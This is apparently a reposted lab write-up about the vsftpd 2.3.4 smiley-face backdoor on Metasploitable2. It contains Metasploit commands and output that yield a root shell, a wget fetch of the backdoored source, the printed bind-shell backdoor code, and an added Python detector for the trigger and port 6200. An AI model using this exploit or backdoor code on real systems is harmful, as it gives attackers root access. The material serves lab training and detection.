Metasploitable2 - tcp port 21 - vsftpd

Source: Internet  Editor: 程序博客网  Time: 2024/06/06 10:06

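Port 21 on Metasploitable2 runs the vsftpd service. An attacker planted a backdoor in the source code of this version. The backdoor was removed quickly, but some people had already downloaded it. If the login username ends with ":)" (a smiley face), a backdoor starts listening on port 6200.

msf > use exploit/unix/ftp/vsftpd_234_backdoor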
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(vsftpd_234_backdoor) > run
 
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.113:44787 -> 192.168.1.111:6200) at 2014-07-29 21:24:27 -0400
 
id
uid=0(root) gid=0(root)

The backdoor code is as follows:

wget http://ftp.gwdg.de/pub/cert.dfn/tools/net/vsftpd/vsftpd-2.3.4.tar.gz

========= [backdoor source] str.c ============
int
str_contains_space(const struct mystr* p_str)
{
  unsigned int i;
  for (i=0; i < p_str->len; i++)
  {
    if (vsf_sysutil_isspace(p_str->p_buf[i]))
    {
      return 1;
    }
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))      // :)

    {
      vsf_sysutil_extra();
    }
  }
  return 0;
}


========= [backdoor source] sysdeputil.c ============

int
vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  exit(1);
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
  for(;;)
  {
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0);
  }
}
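
An added detection example (not part of the original post and not vsftpd or Metasploit code): it flags FTP USER arguments containing the ":)" bytes tested in str.c, flags connections to port 6200 bound by vsf_sysutil_extra(), and correlates the two per host. The log line format, the sample events, the function names and the five-minute window are assumptions made for illustration.

```python
from datetime import datetime, timedelta

TRIGGER = ":)"          # bytes 0x3a 0x29, as tested in the str.c shown above
BACKDOOR_PORT = 6200    # port bound by vsf_sysutil_extra()

# Constructed sample events (not from the original page), in an assumed
# "timestamp src dst dport detail" format.
SAMPLE_EVENTS = """\
2014-07-29T21:24:20 192.168.1.50 192.168.1.111 21 USER alice
2014-07-29T21:24:26 192.168.1.113 192.168.1.111 21 USER backup:)
2014-07-29T21:24:27 192.168.1.113 192.168.1.111 6200 CONNECT
2014-07-29T21:30:00 192.168.1.50 192.168.1.111 21 USER ftp:)user
2014-07-29T22:10:00 192.168.1.77 192.168.1.111 6200 CONNECT
"""

def parse_events(text):
    """Return (time, src, dst, dport, detail) tuples sorted by time."""
    events = []
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue  # skip blank or truncated lines
        ts, src, dst, dport, detail = parts
        events.append((datetime.fromisoformat(ts), src, dst, int(dport), detail))
    return sorted(events)

def detect(events, window=timedelta(minutes=5)):
    """Return alerts as (kind, time, src, dst) tuples."""
    alerts, triggered = [], {}   # triggered: dst host -> time of last trigger
    for ts, src, dst, dport, detail in events:
        if dport == 21 and detail.upper().startswith("USER "):
            # The str.c loop tests each position, so match anywhere in the name.
            if TRIGGER in detail[5:]:
                triggered[dst] = ts
                alerts.append(("trigger-username", ts, src, dst))
        elif dport == BACKDOOR_PORT:
            seen = triggered.get(dst)
            kind = ("backdoor-session" if seen and ts - seen <= window
                    else "port-6200-connection")
            alerts.append((kind, ts, src, dst))
    return alerts

if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(*alert)
```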


vsftp download address:
http://ftp.gwdg.de/pub/cert.dfn/tools/net/vsftpd/
